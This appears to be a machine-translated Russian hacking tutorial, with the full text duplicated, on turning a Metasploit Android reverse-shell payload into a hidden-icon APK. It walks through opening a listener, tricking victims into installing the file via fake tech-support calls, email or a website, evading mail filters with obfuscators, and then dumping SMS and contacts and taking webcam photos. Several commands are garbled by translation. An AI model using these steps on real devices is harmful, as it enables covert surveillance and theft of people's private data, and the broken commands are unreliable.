Добро пожаловать обратно, мои начинающие хакеры!
За последние 10 лет рынок мобильных устройств стремительно вырос. С момента своего зарождения в 2007 году с появлением смартфона Apple, к 2020 году на мобильные устройства приходится более 50% всего интернет-трафика. На планете насчитывается 5 миллиардов мобильных устройств, что примерно соответствует одному устройству на 3/4 населения мира. 75% этих устройств работают на базе операционной системы Android. Учитывая доминирование Android на рынке, вполне логично, что мы сосредоточим наше внимание на этой доминирующей операционной системе.
В этом руководстве мы будем использовать Metasploit для взлома устройств Android, таких как планшеты и телефоны. Как вы увидите, после взлома устройства Android мы сможем собирать текстовые сообщения, список контактов, местоположение жертвы и даже включать её веб-камеру!
По состоянию на 2020 год вредоносные приложения по-прежнему остаются наиболее распространённым методом взлома мобильных устройств Android: почти 80% всех атак совершаются именно с их помощью. Пользователи Android всё чаще сталкиваются с необходимостью устанавливать сторонние приложения, поскольку хотят попробовать уникальные приложения, недоступные в магазине Google Play.
Пользователи Android могут включить загрузку и установку сторонних приложений, просто выполнив следующие шаги.
1. Откройте настройки вашего Android-устройства.
2. Выберите опцию «Приложения и уведомления» .
3. Просто включите опцию «Неизвестные источники».
Примечание: Если вы не нашли эту опцию на вкладке «Приложения и уведомления» , попробуйте найти её в разделе «Безопасность» устройства .
В этом руководстве мы разработаем собственный вредоносный APK-файл, который затем должен быть установлен пользователем из стороннего приложения или физически установлен злоумышленником.
Шаг №1: Найдите уязвимости Android
Первый шаг — поиск эксплойтов Android в Metasploit.
В Metasploit существует множество эксплойтов для взлома Android. Быстрый поиск позволяет найти следующие:
msf > тип поиска: эксплойт платформа: android
Как вы можете видеть, в Metasploit имеется не менее 12 эксплойтов для операционных систем Android.
Шаг №2: Найдите полезные данные Android
Как вы видели в предыдущих уроках по основам Metasploit, Metasploit имеет множество полезных нагрузок , специфичных для операционной системы и эксплойта. Если мы хотим эксплуатировать уязвимость Android, нам понадобится полезная нагрузка Android.
Специфические полезные нагрузки Android можно найти с помощью поиска:
msf > тип поиска: полезная нагрузка платформа: android
Как вы можете видеть, существует множество полезных нагрузок, специфичных для Android, включая payload/android/meterpreter/reverse_tcp , которую мы будем здесь использовать, но можно использовать и другие.
Шаг №3: Создайте APK-файл
Один из самых простых способов взломать систему Android — создать APK-файл (файл Android PacKage) и попросить жертву установить его на свой телефон или планшет. Обычно это делается через физический доступ к телефону или с помощью социальной инженерии («Здравствуйте, это служба технической поддержки. Мы обнаружили необычную активность на вашем телефоне и должны установить приложение службы технической поддержки для отслеживания этой активности…» и т. д.).
Как мы узнали в Основах Metasploit, часть 9 , мы можем использовать утилиту msfvenom в Metasploit для создания собственных полезных нагрузок. В данном случае мы преобразуем payload/android/meterpreter/reverse_tcp в файл .apk для Android.
Для этого введите следующую команду.
msf > msfvenom -p android/meterpreter/reverse_tcp AndroidHideAppIcon=true AndroidWakeLock=true LHOST=192.168.1.101 LPORT=6996 -f raw -o HackersAriseMalwareApp.apk AndroidMalware.apk
Где:
msfvenom команда для создания вредоносной нагрузки
-p android/meterpreter_reverse_tcp имя полезной нагрузки Android
AndroidHideAppIcon=true опция скрывает значок приложения от пользователя
AndroidWakeLock=true — эта опция не даёт телефону перейти в «спящий» режим.
LHOST=192.168.1.101 это IP-адрес злоумышленника (Kali)
LPORT = 6996 это порт для обратной связи со злоумышленником
-f raw — создает полезную нагрузку в формате raw (-f)
-o HackersAriseMalwar
eApp.apk это имя приложения для вывода (- o)
Обратите внимание, что выходные данные жалуются на то, что «Платформа не выбрана» и «Архитектура не выбрана», но msfvenom достаточно умен, чтобы определить по выбранной вами полезной нагрузке, что платформа — Android, а архитектура — Dalvik.
Дополнительную информацию об использовании msfvenom для создания пользовательских полезных нагрузок можно найти в моем руководстве здесь.
Шаг №4: Настройка прослушивателя нескольких обработчиков
Теперь, когда у нас есть APK-файл со встроенной полезной нагрузкой Android, нам нужно открыть прослушиватель в нашей системе для приема подключений от HackersAriseMalwareApp.apk после его установки и запуска. Если вы читали «Основы Metasploit, часть 12» , мы создали rc-скрипт для автоматического запуска и открытия прослушивателя для приема внешних подключений к нашему Metasploit. Если вы это сделали, теперь вы можете запустить его, введя:
msf > resource handler_http.rc
Если у вас нет скрипта прослушивателя, вы можете запустить прослушиватель, введя следующие команды:
msf >использовать эксплойт/мульти/обработчик
msf >set PAYLOAD android/meterpreter/reverse_tcp
msf >set LHOST 192.168.1.101
msf > установить LPORT 6996
msf > эксплуатировать
Вы должны убедиться, что PAYLOAD, LPORT и LHOST те же самые, что вы использовали при создании файла .apk в msfvenom.
Шаг № 5: Доставьте HackersAriseMalwareApp.apk в цель
Следующий шаг, конечно же, — доставка APK-файла на мобильное устройство жертвы. Если у вас есть физический доступ к устройству, просто установите HackersAriseMalwareApp.apk . В противном случае вам придётся отправить его жертве по электронной почте, через DropBox или другими способами. Важно отметить, что этот файл, скорее всего, будет помечен Gmail и другими почтовыми сервисами как вредоносный. Поэтому рассмотрите возможность перекодирования полезной нагрузки с помощью OWASP-ZSC или другого программного обеспечения для обфускации, например, Shellter или Veil-Evasion.
Кроме того, вы можете рассмотреть возможность размещения .apk на своем собственном веб-сайте и призывать людей загружать его.
Шаг №6: Использование целевой системы
После установки .apk-файла на целевой платформе мы должны увидеть приглашение meterpreter, как показано ниже. Затем введите команду sysinfo, чтобы убедиться, что мы на Android-устройстве!
meterpreter > sysinfo
Затем мы можем ввести help , чтобы увидеть все команды Android meterpreter.
meterpreter > помощь
Обратите внимание, что в Android meterpreter есть уникальные опции, такие как:
dump_calllog
dump_contacts
dump_sms
геолокация
send_sms
Эти команды позволяют нам видеть практически всё, что делает цель на этом устройстве, а также определять её местоположение. Этот meterpreter также может использовать некоторые другие стандартные команды meterpreter, такие как:
запись_микрофон
webcam_snap
веб-камера_трансляция
Шаг №7: Сбор данных с устройства Android
Давайте начнем с получения текстовых сообщений цели.
meterpreter > dump_sms
Теперь давайте получим список их контактов.
meterpreter > dump_contacts
Наконец, попробуйте составить список их веб-камер, чтобы позже мы могли сделать с них снимки.
meterpreter > webcam_list
Теперь, когда у нас есть список веб-камер на устройстве, мы можем использовать команду meterpreter webcam_snap, а затем номер веб-камеры, чтобы сделать снимки цели с задней камеры.
meterpreter > webcam_snap 1
Заключение
Metasploit — самая популярная в мире платформа для взлома и пентестинга, способная эксплуатировать практически любую систему, включая мобильные устройства Android. Мы можем создать вредоносный APK-файл, и когда жертва установит приложение, мы получим практически неограниченный доступ к его текстовым сообщениям, контактам и веб-камерам!
Ждите мою новую книгу «Основы Metasploit для хакеров», которая выйдет осенью 2020 года!
За последние 10 лет рынок мобильных устройств стремительно вырос. С момента своего зарождения в 2007 году с появлением смартфона Apple, к 2020 году на мобильные устройства приходится более 50% всего интернет-трафика. На планете насчитывается 5 миллиардов мобильных устройств, что примерно соответствует одному устройству на 3/4 населения мира. 75% этих устройств работают на базе операционной системы Android. Учитывая доминирование Android на рынке, вполне логично, что мы сосредоточим наше внимание на этой доминирующей операционной системе.
В этом руководстве мы будем использовать Metasploit для взлома устройств Android, таких как планшеты и телефоны. Как вы увидите, после взлома устройства Android мы сможем собирать текстовые сообщения, список контактов, местоположение жертвы и даже включать её веб-камеру!
По состоянию на 2020 год вредоносные приложения по-прежнему остаются наиболее распространённым методом взлома мобильных устройств Android: почти 80% всех атак совершаются именно с их помощью. Пользователи Android всё чаще сталкиваются с необходимостью устанавливать сторонние приложения, поскольку хотят попробовать уникальные приложения, недоступные в магазине Google Play.
Пользователи Android могут включить загрузку и установку сторонних приложений, просто выполнив следующие шаги.
1. Откройте настройки вашего Android-устройства.
2. Выберите опцию «Приложения и уведомления» .
3. Просто включите опцию «Неизвестные источники».
Примечание: Если вы не нашли эту опцию на вкладке «Приложения и уведомления» , попробуйте найти её в разделе «Безопасность» устройства .
В этом руководстве мы разработаем собственный вредоносный APK-файл, который затем должен быть установлен пользователем из стороннего приложения или физически установлен злоумышленником.
Шаг №1: Найдите уязвимости Android
Первый шаг — поиск эксплойтов Android в Metasploit.
В Metasploit существует множество эксплойтов для взлома Android. Быстрый поиск позволяет найти следующие:
msf > тип поиска: эксплойт платформа: android
Как вы можете видеть, в Metasploit имеется не менее 12 эксплойтов для операционных систем Android.
Шаг №2: Найдите полезные данные Android
Как вы видели в предыдущих уроках по основам Metasploit, Metasploit имеет множество полезных нагрузок , специфичных для операционной системы и эксплойта. Если мы хотим эксплуатировать уязвимость Android, нам понадобится полезная нагрузка Android.
Специфические полезные нагрузки Android можно найти с помощью поиска:
msf > тип поиска: полезная нагрузка платформа: android
Как вы можете видеть, существует множество полезных нагрузок, специфичных для Android, включая payload/android/meterpreter/reverse_tcp , которую мы будем здесь использовать, но можно использовать и другие.
Шаг №3: Создайте APK-файл
Один из самых простых способов взломать систему Android — создать APK-файл (файл Android PacKage) и попросить жертву установить его на свой телефон или планшет. Обычно это делается через физический доступ к телефону или с помощью социальной инженерии («Здравствуйте, это служба технической поддержки. Мы обнаружили необычную активность на вашем телефоне и должны установить приложение службы технической поддержки для отслеживания этой активности…» и т. д.).
Как мы узнали в Основах Metasploit, часть 9 , мы можем использовать утилиту msfvenom в Metasploit для создания собственных полезных нагрузок. В данном случае мы преобразуем payload/android/meterpreter/reverse_tcp в файл .apk для Android.
Для этого введите следующую команду.
msf > msfvenom -p android/meterpreter/reverse_tcp AndroidHideAppIcon=true AndroidWakeLock=true LHOST=192.168.1.101 LPORT=6996 -f raw -o HackersAriseMalwareApp.apk AndroidMalware.apk
Где:
msfvenom команда для создания вредоносной нагрузки
-p android/meterpreter_reverse_tcp имя полезной нагрузки Android
AndroidHideAppIcon=true опция скрывает значок приложения от пользователя
AndroidWakeLock=true — эта опция не даёт телефону перейти в «спящий» режим.
LHOST=192.168.1.101 это IP-адрес злоумышленника (Kali)
LPORT = 6996 это порт для обратной связи со злоумышленником
-f raw — создает полезную нагрузку в формате raw (-f)
-o HackersAriseMalwar
eApp.apk это имя приложения для вывода (- o)
Обратите внимание, что выходные данные жалуются на то, что «Платформа не выбрана» и «Архитектура не выбрана», но msfvenom достаточно умен, чтобы определить по выбранной вами полезной нагрузке, что платформа — Android, а архитектура — Dalvik.
Дополнительную информацию об использовании msfvenom для создания пользовательских полезных нагрузок можно найти в моем руководстве здесь.
Шаг №4: Настройка прослушивателя нескольких обработчиков
Теперь, когда у нас есть APK-файл со встроенной полезной нагрузкой Android, нам нужно открыть прослушиватель в нашей системе для приема подключений от HackersAriseMalwareApp.apk после его установки и запуска. Если вы читали «Основы Metasploit, часть 12» , мы создали rc-скрипт для автоматического запуска и открытия прослушивателя для приема внешних подключений к нашему Metasploit. Если вы это сделали, теперь вы можете запустить его, введя:
msf > resource handler_http.rc
Если у вас нет скрипта прослушивателя, вы можете запустить прослушиватель, введя следующие команды:
msf >использовать эксплойт/мульти/обработчик
msf >set PAYLOAD android/meterpreter/reverse_tcp
msf >set LHOST 192.168.1.101
msf > установить LPORT 6996
msf > эксплуатировать
Вы должны убедиться, что PAYLOAD, LPORT и LHOST те же самые, что вы использовали при создании файла .apk в msfvenom.
Шаг № 5: Доставьте HackersAriseMalwareApp.apk в цель
Следующий шаг, конечно же, — доставка APK-файла на мобильное устройство жертвы. Если у вас есть физический доступ к устройству, просто установите HackersAriseMalwareApp.apk . В противном случае вам придётся отправить его жертве по электронной почте, через DropBox или другими способами. Важно отметить, что этот файл, скорее всего, будет помечен Gmail и другими почтовыми сервисами как вредоносный. Поэтому рассмотрите возможность перекодирования полезной нагрузки с помощью OWASP-ZSC или другого программного обеспечения для обфускации, например, Shellter или Veil-Evasion.
Кроме того, вы можете рассмотреть возможность размещения .apk на своем собственном веб-сайте и призывать людей загружать его.
Шаг №6: Использование целевой системы
После установки .apk-файла на целевой платформе мы должны увидеть приглашение meterpreter, как показано ниже. Затем введите команду sysinfo, чтобы убедиться, что мы на Android-устройстве!
meterpreter > sysinfo
meterpreter > помощь
Обратите внимание, что в Android meterpreter есть уникальные опции, такие как:
dump_calllog
dump_contacts
dump_sms
геолокация
send_sms
Эти команды позволяют нам видеть практически всё, что делает цель на этом устройстве, а также определять её местоположение. Этот meterpreter также может использовать некоторые другие стандартные команды meterpreter, такие как:
запись_микрофон
webcam_snap
веб-камера_трансляция
Шаг №7: Сбор данных с устройства Android
Давайте начнем с получения текстовых сообщений цели.
meterpreter > dump_sms
Теперь давайте получим список их контактов.
meterpreter > dump_contacts
Наконец, попробуйте составить список их веб-камер, чтобы позже мы могли сделать с них снимки.
meterpreter > webcam_list
Теперь, когда у нас есть список веб-камер на устройстве, мы можем использовать команду meterpreter webcam_snap, а затем номер веб-камеры, чтобы сделать снимки цели с задней камеры.
meterpreter > webcam_snap 1
Заключение
Metasploit — самая популярная в мире платформа для взлома и пентестинга, способная эксплуатировать практически любую систему, включая мобильные устройства Android. Мы можем создать вредоносный APK-файл, и когда жертва установит приложение, мы получим практически неограниченный доступ к его текстовым сообщениям, контактам и веб-камерам!
Ждите мою новую книгу «Основы Metasploit для хакеров», которая выйдет осенью 2020 года!